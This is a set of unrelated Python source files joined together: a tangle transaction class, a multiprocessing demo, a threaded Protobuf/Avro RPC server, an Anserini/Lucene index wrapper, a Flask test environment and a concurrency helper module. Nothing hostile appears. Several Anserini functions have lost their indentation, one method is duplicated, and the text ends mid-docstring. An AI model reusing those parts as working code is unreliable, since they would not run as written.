        return self.dag.transaction_cache
    def approved_by_delayed(self):
        # Same as approved_by, restricted to visible direct approvers.
        for t in self.approved_directly_by():
            if t not in self.dag.transaction_cache:
                self.dag.transaction_cache.add(t)
                self.dag.transaction_cache.update(t.approved_by_delayed())
        return self.dag.transaction_cache
    def approved_directly_by(self):
        # Only approvals that are already visible to the network.
        return [p for p in self._approved_directly_by if p.is_visible()]
    def __repr__(self):
        return '<Transaction {}>'.format(self.num)
class Genesis(Transaction):
    """The unique root transaction of the tangle (num 0, time 0)."""
    def __init__(self, dag):
        # Deliberately does not call Transaction.__init__: the genesis has a
        # fixed identity and approves nothing.
        self.dag = dag
        self.num = 0
        self.time = 0
        self.approved_transactions = []
        self._approved_directly_by = set()
        self.approved_time = float('inf')
        if hasattr(self.dag, 'graph'):
            self.dag.graph.add_node(self.num, pos=(self.time, 0))
    def __repr__(self):
        return '<Genesis>'
|
processing_example.py | import multiprocessing
import time
def some_other_func(name, arg2):
    # Worker body for the child process: print a startup line, then emit a
    # heartbeat dot once per second until terminated externally (never returns).
    print("[{0}] - start running process, arg={1}".format(name, arg2))
    # time.sleep(1)
    while True:
        time.sleep(1)
        print('[{0}] - .'.format(name))
if __name__ == '__main__':
    # Demo: spawn a worker process, observe is_alive/exitcode around its
    # lifetime, then terminate it.
    p1_name = 'process1'
    p1 = multiprocessing.Process(target=some_other_func, args=(p1_name, 'foo',))
    print('[{0}] - is_alive={1}'.format(p1_name, p1.is_alive()))
    print('[{0}] - start() call'.format(p1_name))
    p1.start()
    print('[{0}] - is_alive={1}'.format(p1_name, p1.is_alive()))
    time.sleep(1)
    # time.sleep(5)
    # exitcode is None while the child is still running.
    print('[{0}] - exitcode={1}'.format(p1_name, p1.exitcode))
    try:
        p1.terminate()
        print('[{0}] - terminated'.format(p1_name))
    except:
        print('force terminate')
    print('[{0}] - exitcode={1}'.format(p1_name, p1.exitcode))
    # print(p, p.is_alive())
    # p.exitcode == -signal.SIGTERM
|
server.py | # -*-coding:utf-8-*-
import psutil
import time
from threading import Thread
import socketserver
from socketserver import TCPServer, ThreadingMixIn
from typing import Tuple
from enum import Enum, unique
from rpcserver.avro.proxy import AvroProxyFactory
from rpcserver.logger import logger
from rpcserver.protobuf import handler as protobuf_handler
from rpcserver.avro import handler as avro_handler
@unique
class Protocol(Enum):
    # Serialization protocols the RPC server can speak; @unique guards
    # against duplicate values.
    Protobuf = 0
    Avro = 1
def process_check(pid, server):
    # Watchdog: poll once a second until the process `pid` (the parent that
    # spawned this server) disappears, then shut the RPC server down so the
    # child does not outlive it.
    while 1:
        try:
            psutil.Process(pid)  # raises NoSuchProcess once the pid is gone
            time.sleep(1)
        except psutil.NoSuchProcess:
            break
    server.shutdown()
class SocketServer:
    """Threaded RPC socket server speaking either Protobuf or Avro."""
    def __init__(self, port, host='0.0.0.0', protocol=Protocol.Avro):
        self.host = host
        self.port = port
        # Protobuf service full name -> service implementation.
        self.serviceMap = {}
        self.protocols = []
        self.avro_proxy_factory = None
        self.proto = protocol
    def register_service(self, service=None) -> None:
        # Register a protobuf service keyed by its descriptor's full name;
        # a None service is silently ignored.
        if service is None:
            return
        self.serviceMap[service.GetDescriptor().full_name] = service
    def register_avro_protocols(self, protocols) -> None:
        # Load every Avro protocol into a freshly created proxy factory.
        self.protocols = protocols
        self.avro_proxy_factory = AvroProxyFactory()
        for protocol in protocols:
            self.avro_proxy_factory.load(protocol)
    def run(self, pid) -> None:
        """Serve forever. If `pid` is given, a daemon watchdog thread shuts
        the server down when that process exits; Ctrl-C also shuts it down."""
        logger.info('starting server on host: %s - port: %d' % (self.host, self.port))
        handler = avro_handler.RequestHandler
        if self.proto == Protocol.Protobuf:
            handler = protobuf_handler.RequestHandler
        server = None
        try:
            server = ThreadingTCPServer((self.host, self.port), handler, self)
            if pid is not None:
                Thread(target=process_check, args=(pid, server), daemon=True).start()
            server.serve_forever()
        except KeyboardInterrupt:
            if server is not None:
                server.shutdown()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
    """TCP server that handles each request in its own thread and forwards
    the owning SocketServer to every request handler."""
    # BUGFIX: the original executed `socketserver.allow_reuse_address = True`
    # in the class body, which set an attribute on the socketserver *module*
    # rather than on this class, so SO_REUSEADDR was never applied. Declare
    # the class attribute that TCPServer.server_bind() actually consults.
    allow_reuse_address = True

    def __init__(self, server_address, handler, server):
        socketserver.TCPServer.__init__(self, server_address, handler)
        # The high-level SocketServer owning the service/protocol registries.
        self.server = server

    def finish_request(self, request: bytes,
                       client_address: Tuple[str, int]) -> None:
        # Extra `self.server` argument lets the handler reach registered
        # services/protocols.
        self.RequestHandlerClass(request, client_address, self, self.server)
|
multifield_anserini.py | import os
import math
import json
import tempfile
import itertools
import time
import re
import shutil
import threading
import contextlib
from multiprocessing.pool import ThreadPool
from functools import lru_cache
from pytools import memoize_method
import onir
from onir import indices
from onir.interfaces import trec
from onir.interfaces.java import J
logger = onir.log.easy()
J.register(jars=["bin/lucene-backward-codecs-8.0.0.jar", "bin/anserini-0.8.0-fatjar.jar"], defs=dict(
# [L]ucene
L_FSDirectory='org.apache.lucene.store.FSDirectory',
L_DirectoryReader='org.apache.lucene.index.DirectoryReader',
L_Term='org.apache.lucene.index.Term',
L_IndexSearcher='org.apache.lucene.search.IndexSearcher',
L_BM25Similarity='org.apache.lucene.search.similarities.BM25Similarity',
L_ClassicSimilarity='org.apache.lucene.search.similarities.ClassicSimilarity',
L_LMDirichletSimilarity='org.apache.lucene.search.similarities.LMDirichletSimilarity',
L_QueryParser='org.apache.lucene.queryparser.flexible.standard.StandardQueryParser',
L_QueryParserUtil='org.apache.lucene.queryparser.flexible.standard.QueryParserUtil',
L_StandardAnalyzer='org.apache.lucene.analysis.standard.StandardAnalyzer',
L_EnglishAnalyzer='org.apache.lucene.analysis.en.EnglishAnalyzer',
L_CharArraySet='org.apache.lucene.analysis.CharArraySet',
L_MultiFields='org.apache.lucene.index.MultiFields',
# [A]nserini
A_IndexCollection='io.anserini.index.IndexCollection',
A_IndexArgs='io.anserini.index.IndexArgs',
A_IndexUtils='io.anserini.index.IndexUtils',
A_LuceneDocumentGenerator='io.anserini.index.generator.LuceneDocumentGenerator',
A_SearchCollection='io.anserini.search.SearchCollection',
A_SearchArgs='io.anserini.search.SearchArgs',
A_DefaultEnglishAnalyzer='io.anserini.analysis.DefaultEnglishAnalyzer',
A_AnalyzerUtils='io.anserini.analysis.AnalyzerUtils',
# [M]isc
M_CmdLineParser='org.kohsuke.args4j.CmdLineParser',
))
def _surpress_log(java_class, levels=('DEBUG', 'INFO')):
re_levels = r'|'.join([re.escape(l) for l in levels])
re_java_class = re.escape(java_class)
regex = rf'({re_levels}) {re_java_class}'
def wrapped(log_line):
return re.search(regex, log_line) is None
return wrapped
def pbar_bq_listener(pbar):
    """Build a log listener that advances `pbar` to the cumulative query count
    reported by Anserini's SearchCollection, suppressing every line (always
    returns False)."""
    progress_re = re.compile(r'INFO io.anserini.search.SearchCollection \[pool-.*-thread-.*\] ([0-9]+) queries processed')
    def listen(log_line):
        found = progress_re.search(log_line)
        if found:
            done = int(found.group(1))
            pbar.update(done - pbar.n)
        return False
    return listen
class MultifieldAnseriniIndex(indices.BaseIndex):
"""
Interface to an Anserini index.
"""
    def __init__(self, path, keep_stops=False, stemmer='porter', primary_field='text', lang='en'):
        """Open (or initialize) an Anserini index rooted at `path`.

        A relative symlink `<path>-<primary_field>` is created so the same
        physical index can be addressed once per primary field. Analysis
        settings are persisted to settings.json and must match on re-open.
        """
        self._base_path = path
        os.makedirs(path, exist_ok=True)
        self._path = f'{path}-{primary_field}'
        if not os.path.exists(self._path):
            # Relative link (last path component) so the pair stays valid if
            # the parent directory moves.
            os.symlink(self._base_path.split('/')[-1], self._path, target_is_directory=True)
        self._primary_field = primary_field
        self._settings_path = os.path.join(path, 'settings.json')
        if os.path.exists(self._settings_path):
            self._load_settings()
            # Re-opening with different analysis settings would silently mix
            # incompatible postings; fail fast instead.
            assert self._settings['keep_stops'] == keep_stops
            assert self._settings['stemmer'] == stemmer
            assert self._settings['lang'] == lang
        else:
            self._settings = {
                'keep_stops': keep_stops,
                'stemmer': stemmer,
                'lang': lang,
                'built': False
            }
            self._dump_settings()
    def _dump_settings(self):
        # Persist the current settings dict to settings.json (overwrites).
        with open(self._settings_path, 'wt') as f:
            json.dump(self._settings, f)
    def _load_settings(self):
        # Reload settings.json; default 'lang' for indexes created before
        # that field existed.
        with open(self._settings_path, 'rt') as f:
            self._settings = json.load(f)
        if 'lang' not in self._settings:
            self._settings['lang'] = 'en'
def built(self):
self._load_settings()
return self._settings['built']
def built(self):
self._load_settings()
return self._settings['built']
    def num_docs(self):
        # Total number of documents in the Lucene index.
        return self._reader().numDocs()
    def docids(self):
        # Yield external (collection) docids by converting every internal
        # Lucene docid 0..numDocs-1.
        index_utils = self._get_index_utils()
        for i in range(self.num_docs()):
            yield index_utils.convertLuceneDocidToDocid(i)
    def get_raw(self, did):
        # Raw stored form of the document with external id `did`.
        return self._get_index_utils().getRawDocument(did)
    def path(self):
        # Path of the per-primary-field symlink to the index directory.
        return self._path
    @memoize_method
    def _reader(self):
        # Lucene DirectoryReader over the index (memoized per instance).
        return J.L_DirectoryReader.open(J.L_FSDirectory.open(J.File(self._path).toPath()))
    @memoize_method
    def _searcher(self):
        # IndexSearcher built over the shared reader (memoized per instance).
        return J.L_IndexSearcher(self._reader().getContext())
    @memoize_method
    def term2idf(self, term):
        """BM25-style IDF of `term` after stemming; 0.0 when the analyzer
        yields no tokens (stop word)."""
        term = J.A_AnalyzerUtils.tokenize(self._get_stemmed_analyzer(), term).toArray()
        if term:
            # Only the first produced token is used for the docFreq lookup.
            df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
            doc_count = self.collection_stats().docCount()
            return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
        return 0.  # stop word; very common
    @memoize_method
    def term2idf_unstemmed(self, term):
        """IDF of `term` without stemming; 0.0 when the analyzer does not
        produce exactly one token.

        NOTE(review): term2idf accepts any non-empty token array (`if term:`)
        while this requires len == 1 — confirm the asymmetry is intended.
        """
        term = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), term).toArray()
        if len(term) == 1:
            df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
            doc_count = self.collection_stats().docCount()
            return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
        return 0.  # stop word; very common
    def doc_freq(self, term):
        # Document frequency of an already-analyzed term in the primary field.
        return self._reader().docFreq(J.L_Term(self._primary_field, term))
    @memoize_method
    def collection_stats(self):
        # Lucene CollectionStatistics for the primary field (memoized).
        return self._searcher().collectionStatistics(self._primary_field)
    def document_vector(self, did):
        # Term -> total term frequency map read from the stored term vector
        # of document `did` (primary field only).
        result = {}
        ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
        vec = self._reader().getTermVector(ldid, self._primary_field)
        it = vec.iterator()
        while it.next():
            result[it.term().utf8ToString()] = it.totalTermFreq()
        return result
def avg_dl(self):
cs = self.collection_stats()
return cs.sumTotalTermFreq() / cs.docCount()
    @memoize_method
    def _get_index_utils(self):
        # Anserini IndexUtils helper for docid conversion and raw/transformed
        # document access (memoized).
        return J.A_IndexUtils(self._path)
    @lru_cache(maxsize=16)
    def get_doc(self, did):
        # Analyzed (transformed) document terms; returns ["a"] for missing or
        # empty documents so downstream code always sees a non-empty list.
        ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
        if ldid == -1:
            return ["a"]  # hack -- missing doc
        return self._get_index_utils().getTransformedDocument(did) or ["a"]
    @memoize_method
    def _get_analyzer(self):
        # StandardAnalyzer with an empty stop-word set (keeps all tokens).
        return J.L_StandardAnalyzer(J.L_CharArraySet(0, False))
    @memoize_method
    def _get_stemmed_analyzer(self):
        # Stemming analyzer (configured stemmer) with no stop words.
        # NOTE(review): J.A_EnglishStemmingAnalyzer is not among the classes
        # registered in this file's J.register() call (only
        # A_DefaultEnglishAnalyzer is) — confirm it is registered elsewhere.
        return J.A_EnglishStemmingAnalyzer(self._settings['stemmer'], J.L_CharArraySet(0, False))
    def tokenize(self, text):
        # Unstemmed tokenization via the standard analyzer; contractions are
        # additionally split on the apostrophe.
        result = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), text).toArray()
        # mostly good, just gonna split off contractions
        result = list(itertools.chain(*(x.split("'") for x in result)))
        return result
    def iter_terms(self):
        """Yield {'term', 'df', 'cf'} for every term of the primary field,
        iterating across all index segments (leaves)."""
        it_leaves = self._reader().leaves().iterator()
        while it_leaves.hasNext():
            it_terms = it_leaves.next().reader().terms(self._primary_field).iterator()
            while it_terms.next():
                yield {
                    'term': it_terms.term().utf8ToString(),
                    'df': it_terms.docFreq(),
                    'cf': it_terms.totalTermFreq(),
                }
@memoize_method
def _model(self, model):
if model == 'randomqrels':
return self._model('bm25_k1-0.6_b-0.5')
if model.startswith('bm25'):
k1, b = 0.9, 0.4
Model = J.L_BM25Similarity
for arg in model.split('_')[1:]:
if '-' in arg:
k, v = arg.split('-')
else:
k, v = arg, None
if k == 'k1':
k1 = float(v)
elif k == 'b':
b = float(v)
elif k == 'noidf':
Model = J.A_BM25SimilarityNoIdf
else:
raise ValueError(f'unknown bm25 parameter {k}={v}')
return Model(k1, b)
elif model == 'vsm':
return J.L_ClassicSimilarity()
elif model == 'ql':
mu = 1000.
for k, v in [arg.split('-') for arg in model.split('_')[1:]]:
if k == 'mu':
mu = float(v)
else:
raise ValueError(f'unknown ql parameter {k}={v}')
return J.L_LMDirichletSimilarity(mu)
raise ValueError(f'unknown model {model}')
    @memoize_method
    def get_query_doc_scores(self, query, did, model, skip_invividual=False):
        """Score document `did` against `query` (a list of terms) under `model`.

        Returns (total, per-term score list) unless skip_invividual is True,
        in which case a single aggregate Lucene explain score is returned.
        Missing documents yield a large negative sentinel instead of raising.
        """
        sim = self._model(model)
        self._searcher().setSimilarity(sim)
        ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
        if ldid == -1:
            # Document not in the index: sentinel scores keep ranking usable.
            return -999. * len(query), [-999.] * len(query)
        analyzer = self._get_stemmed_analyzer()
        query = list(itertools.chain(*[J.A_AnalyzerUtils.tokenize(analyzer, t).toArray() for t in query]))
        if not skip_invividual:
            result = []
            for q in query:
                q = _anserini_escape(q, J)
                lquery = J.L_QueryParser().parse(q, self._primary_field)
                explain = self._searcher().explain(lquery, ldid)
                result.append(explain.getValue().doubleValue())
            return sum(result), result
        lquery = J.L_QueryParser().parse(_anserini_escape(' '.join(query), J), self._primary_field)
        explain = self._searcher().explain(lquery, ldid)
        # NOTE(review): this path returns the Java Number object (no
        # .doubleValue()), unlike the branch above — confirm callers expect it.
        return explain.getValue()
    def get_query_doc_scores_batch(self, query, dids, model):
        """Score many docids against `query` in a single Lucene search.

        Returns {did: score}; docids that do not match the query at all are
        absent from the result.
        """
        sim = self._model(model)
        self._searcher().setSimilarity(sim)
        # Map internal Lucene ids back to external docids for the result dict.
        ldids = {self._get_index_utils().convertDocidToLuceneDocid(did): did for did in dids}
        analyzer = self._get_stemmed_analyzer()
        query = J.A_AnalyzerUtils.tokenize(analyzer, query).toArray()
        query = ' '.join(_anserini_escape(q, J) for q in query)
        # Restrict the search to the requested documents via an ID clause.
        docs = ' '.join(f'{J.A_LuceneDocumentGenerator.FIELD_ID}:{did}' for did in dids)
        lquery = J.L_QueryParser().parse(f'({query}) AND ({docs})', self._primary_field)
        result = {}
        search_results = self._searcher().search(lquery, len(dids))
        for top_doc in search_results.scoreDocs:
            result[ldids[top_doc.doc]] = top_doc.score
        del search_results
        return result
    def build(self, doc_iter, replace=False, optimize=True, store_term_weights=False):
        """Index the documents from `doc_iter` with Anserini's IndexCollection.

        Documents are streamed to the (Java) indexer through per-thread named
        pipes (FIFOs) in a temporary directory, avoiding a full on-disk copy
        of the collection. With replace=True an existing index is removed
        first; otherwise documents are added to it.
        """
        with logger.duration(f'building {self._base_path}'):
            thread_count = onir.util.safe_thread_count()
            with tempfile.TemporaryDirectory() as d:
                if self._settings['built']:
                    if replace:
                        logger.warn(f'removing index: {self._base_path}')
                        shutil.rmtree(self._base_path)
                    else:
                        logger.warn(f'adding to existing index: {self._base_path}')
                # One FIFO per indexer thread; stored as paths until first use.
                fifos = []
                for t in range(thread_count):
                    fifo = os.path.join(d, f'{t}.json')
                    os.mkfifo(fifo)
                    fifos.append(fifo)
                index_args = J.A_IndexArgs()
                index_args.collectionClass = 'JsonCollection'
                index_args.generatorClass = 'LuceneDocumentGenerator'
                index_args.threads = thread_count
                index_args.input = d
                index_args.index = self._base_path
                index_args.storePositions = True
                index_args.storeDocvectors = True
                index_args.storeTermWeights = store_term_weights
                index_args.keepStopwords = self._settings['keep_stops']
                index_args.stemmer = self._settings['stemmer']
                index_args.optimize = optimize
                indexer = J.A_IndexCollection(index_args)
                thread = threading.Thread(target=indexer.run)
                thread.start()
                time.sleep(1)  # give it some time to start up, otherwise fails due to race condition
                for i, doc in enumerate(doc_iter):
                    # FIFOs are opened lazily on first write (open blocks
                    # until the indexer opens the read end).
                    f = fifos[hash(i) % thread_count]
                    if isinstance(f, str):
                        f = open(f, 'wt')
                        fifos[hash(i) % thread_count] = f
                    # 'contents' is a dummy field; the real fields come from
                    # doc.data.
                    data = {'id': doc.did, 'contents': 'a'}
                    data.update(doc.data)
                    json.dump(data, f)
                    f.write('\n')
                for f in fifos:
                    if not isinstance(f, str):
                        f.close()
                    else:
                        with open(f, 'wt'):
                            pass  # open and close to indicate file is done
                logger.debug('waiting to join')
                thread.join()
                self._settings['built'] = True
                self._dump_settings()
    def query(self, query, model, topk, destf=None, quiet=False):
        # Single-query convenience wrapper over batch_query (uses qid '0').
        return self.batch_query([('0', query)], model, topk, destf=destf, quiet=quiet)['0']
def batch_query(self, queries, model, topk, destf=None, quiet=False):
    """
    Run *queries* (iterable of ``(qid, text)`` pairs) against the index with
    Anserini's SearchCollection, fanning the topic files out over a thread pool.

    :param queries: iterable of ``(qid, text)`` pairs.
    :param model: retrieval model spec, translated to CLI flags by ``_model2args``
        (e.g. 'bm25_k1-0.9').
    :param topk: maximum number of hits per query.
    :param destf: when given, the merged TREC run is written to this path and
        nothing is returned; otherwise a dict mapping qid -> run dict is returned.
    :param quiet: NOTE(review): accepted but never read in this body — confirm
        whether it should suppress the progress bar.
    """
    THREADS = onir.util.safe_thread_count()
    query_file_splits = 1000
    # Pick how many queries go into each topic file so the per-thread work is
    # roughly balanced for small, medium and large batches.
    if hasattr(queries, '__len__'):
        if len(queries) < THREADS:
            THREADS = len(queries)
            query_file_splits = 1
        elif len(queries) < THREADS * 10:
            query_file_splits = ((len(queries)+1) // THREADS)
        elif len(queries) < THREADS * 100:
            query_file_splits = ((len(queries)+1) // (THREADS * 10))
        else:
            query_file_splits = ((len(queries)+1) // (THREADS * 100))
    with tempfile.TemporaryDirectory() as topic_d, tempfile.TemporaryDirectory() as run_d:
        run_f = os.path.join(run_d, 'run')  # NOTE(review): appears unused — confirm
        topic_files = []
        file_topic_counts = []
        current_file = None
        total_topics = 0
        # Split the queries into chunked TSV topic files of query_file_splits
        # queries each; track per-file counts for progress reporting.
        for i, (qid, text) in enumerate(queries):
            topic_file = '{}/{}.queries'.format(topic_d, i // query_file_splits)
            if current_file is None or current_file.name != topic_file:
                if current_file is not None:
                    topic_files.append(current_file.name)
                    current_file.close()
                current_file = open(topic_file, 'wt')
                file_topic_counts.append(0)
            current_file.write(f'{qid}\t{text}\n')
            file_topic_counts[-1] += 1
            total_topics += 1
        if current_file is not None:
            topic_files.append(current_file.name)
            current_file.close()
        J.initialize()
        with ThreadPool(THREADS) as pool, \
             logger.pbar_raw(desc=f'batch_query ({model})', total=total_topics) as pbar:
            def fn(inputs):
                # Worker: run Anserini SearchCollection over one topic file and
                # return the path of the produced run file plus its query count.
                file, count = inputs
                args = J.A_SearchArgs()
                parser = J.M_CmdLineParser(args)
                arg_args = [
                    '-index', self._path,
                    '-topics', file,
                    '-output', file + '.run',
                    '-topicreader', 'TsvString',
                    '-hits', str(topk),
                    '-stemmer', self._settings['stemmer'],
                    '-indexfield', self._primary_field,
                ]
                arg_args += self._model2args(model)
                parser.parseArgument(*arg_args)
                searcher = J.A_SearchCollection(args)
                searcher.runTopics()
                searcher.close()
                return file + '.run', count
            if destf:
                # Stream results straight to a temp file; renamed at the end so
                # destf only ever appears complete.
                result = open(destf + '.tmp', 'wb')
            else:
                result = {}
            for resultf, count in pool.imap_unordered(fn, zip(topic_files, file_topic_counts)):
                if destf:
                    with open(resultf, 'rb') as f:
                        for line in f:
                            result.write(line)
                else:
                    run = trec.read_run_dict(resultf)
                    result.update(run)
                pbar.update(count)
            if destf:
                result.close()
                shutil.move(destf + '.tmp', destf)
            else:
                return result
def _model2args(self, model):
arg_args = []
if model.startswith('bm25'):
arg_args.append('-bm25')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'k1':
arg_args.append('-bm25.k1')
arg_args.append(v)
elif k == 'b':
arg_args.append('-bm25.b')
arg_args.append(v)
elif k == 'rm3':
arg_args.append('-rm3')
elif k == 'rm3.fbTerms':
arg_args.append('-rm3.fbTerms')
arg_args.append(v)
elif k == 'rm3.fbDocs':
arg_args.append('-rm3.fbDocs')
arg_args.append(v)
elif k == 'sdm':
arg_args.append('-sdm')
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown bm25 parameter {arg}')
elif model.startswith('ql'):
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
else:
raise ValueError(f'unknown ql parameter {arg}')
elif model.startswith('sdm'):
arg_args.append('-sdm')
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown sdm parameter {arg}')
else:
raise ValueError(f'unknown model {model}')
return arg_args
|
testing.py | # Copyright 2021 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: James Diprose
import contextlib
import threading
from observatory.api.server.api import create_app
from observatory.api.server.orm import create_session, set_session
from sqlalchemy.pool import StaticPool
from werkzeug.serving import make_server
class ObservatoryApiEnvironment:
    def __init__(self, host: str = "localhost", port: int = 5000, seed_db: bool = False):
        """Create an ObservatoryApiEnvironment instance.

        :param host: the host name.
        :param port: the port.
        :param seed_db: whether to seed the database or not.
        """
        self.host = host
        self.port = port
        self.seed_db = seed_db
        self.db_uri = "sqlite://"
        self.session = None
        self.server = None
        self.server_thread = None

    @contextlib.contextmanager
    def create(self):
        """Make and destroy an Observatory API isolated environment, which involves:

        * Creating an in memory SQLite database for the API backend to connect to
        * Starting the Connexion / Flask app

        :yield: None.
        """
        try:
            # Connect to in memory SQLite database with SQLAlchemy.
            # StaticPool + check_same_thread=False lets the server thread share
            # the single in-memory connection.
            self.session = create_session(
                uri=self.db_uri, connect_args={"check_same_thread": False}, poolclass=StaticPool
            )
            set_session(self.session)

            # Create the Connexion App and start the server
            app = create_app()
            self.server = make_server(self.host, self.port, app)
            self.server_thread = threading.Thread(target=self.server.serve_forever)
            self.server_thread.start()
            yield
        finally:
            # Stop server and wait for server thread to join. Guard against
            # setup failures: if create_session/make_server raised above, the
            # attributes are still None and an unconditional shutdown() would
            # raise AttributeError, masking the original exception.
            if self.server is not None:
                self.server.shutdown()
            if self.server_thread is not None:
                self.server_thread.join()
|
concurrency.py | # The MIT License (MIT)
#
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module provides a simple interface to creating and managing concurrent
tasks. Note that the module does not primarily focus on performance
multithreading, but to enable writing multitask applications with ease.
Compatible with Python 2 and 3.
# Example
```python
from nr.concurrency import Job, as_completed
from requests import get
urls = ['https://google.com', 'https://github.com', 'https://readthedocs.org']
for job in as_completed(Job((lambda: get(x)), start=True) for x in urls):
print(job.result)
```
# Members
main_thread (threading._MainThread): The main-thread object.
"""
from threading import current_thread
import collections
import functools
import threading
import time
import traceback
import sys
try:
import queue
except ImportError:
import Queue as queue
# Resolve the main-thread object once at import time. threading._MainThread is
# private API, but scanning threading.enumerate() for it works on both Python 2
# and 3 (threading.main_thread() is Python 3 only, and this module supports both).
main_thread = next(t for t in threading.enumerate()
                   if isinstance(t, threading._MainThread))
# Synchronizable API
# ============================================================================
class Synchronizable(object):
    """
    Base class for objects that can be used with the module-level
    #synchronized(), #wait(), #notify() and #notify_all() functions.

    Every instance automatically receives a lock and a condition variable at
    construction time (in #__new__, so subclasses need not call this class'
    initializer).

    # Attributes
    synchronizable_lock_type[static]: A type or factory returning a lock
      object. Defaults to #threading.RLock.
    synchronizable_condition_type[static]: A type or factory that accepts an
      instance of `synchronizable_lock_type` as its first argument and returns
      a new condition variable.
    synchronizable_lock: The per-instance lock.
    synchronizable_condition: The per-instance condition variable, created
      around `synchronizable_lock`.
    """

    synchronizable_lock_type = staticmethod(threading.RLock)
    synchronizable_condition_type = staticmethod(threading.Condition)

    def __new__(cls, *args, **kwargs):
        obj = super(Synchronizable, cls).__new__(cls)
        lock = cls.synchronizable_lock_type()
        obj.synchronizable_lock = lock
        obj.synchronizable_condition = cls.synchronizable_condition_type(lock)
        return obj
def synchronized(obj):
    """
    Dual-purpose synchronization helper:

    1. As a decorator, wraps a method so that its body runs while holding the
       first argument's (usually `self`'s) `synchronizable_condition`.
    2. Called on a #Synchronizable instance, returns that instance's condition
       variable for use in a `with`-statement.

    Note that #wait(), #notify() and #notify_all() may only be used on
    synchronized objects.

    # Example
    ```python
    class Box(Synchronizable):
      def __init__(self):
        self.value = None
      @synchronized
      def get(self):
        return self.value
      @synchronized
      def set(self, value):
        self.value = value

    box = Box()
    box.set('foobar')
    with synchronized(box):
      box.value = 'taz\'dingo'
    print(box.get())
    ```

    # Arguments
    obj (Synchronizable, function): The object to synchronize access to, or a
      function to decorate.

    # Returns
    1. The decorated function.
    2. The value of `obj.synchronizable_condition`, which should implement the
      context-manager interface (to be used in a `with`-statement).
    """
    if hasattr(obj, 'synchronizable_condition'):
        return obj.synchronizable_condition
    if callable(obj):
        @functools.wraps(obj)
        def locked_call(self, *args, **kwargs):
            with self.synchronizable_condition:
                return obj(self, *args, **kwargs)
        return locked_call
    raise TypeError('expected Synchronizable instance or callable to decorate')
def wait(obj, timeout=None):
    """
    Block until *obj* is notified with #notify() or #notify_all(), or until
    *timeout* seconds have elapsed.

    Only usable on #synchronized() objects, and the caller must hold the
    object's condition (e.g. inside `with synchronized(obj):`).

    # Arguments
    obj (Synchronizable): An object that can be synchronized.
    timeout (number, None): Maximum number of seconds to wait. If #None, waits
      indefinitely.
    """
    condition = obj.synchronizable_condition
    if timeout is None:
        return condition.wait()
    return condition.wait(timeout)
def wait_for_condition(obj, cond, timeout=None):
    """
    Extended version of #wait() that repeatedly tests the predicate *cond*
    against *obj* to decide when to stop waiting. *obj* must be notified
    whenever its state changes for the predicate to be re-evaluated; access to
    *obj* is synchronized while *cond* runs.

    # Arguments
    obj (Synchronizable): The object to synchronize and wait on.
    cond (function): Predicate taking *obj*; return #True when the condition
      is met.
    timeout (number, None): The maximum number of seconds to wait.

    # Returns
    bool: #True if the condition was met, #False on timeout.
    """
    with synchronized(obj):
        if timeout is None:
            while not cond(obj):
                wait(obj)
            return True
        deadline = time.time() + timeout
        while not cond(obj):
            remaining = deadline - time.time()
            if remaining <= 0:
                return False
            wait(obj, remaining)
        return True
def notify(obj):
    """
    Wake up a single thread that is blocked in #wait() on *obj*. Only usable
    on #synchronized() objects, while holding the object's condition.

    # Arguments
    obj (Synchronizable): The object to notify.
    """
    condition = obj.synchronizable_condition
    return condition.notify()
def notify_all(obj):
    """
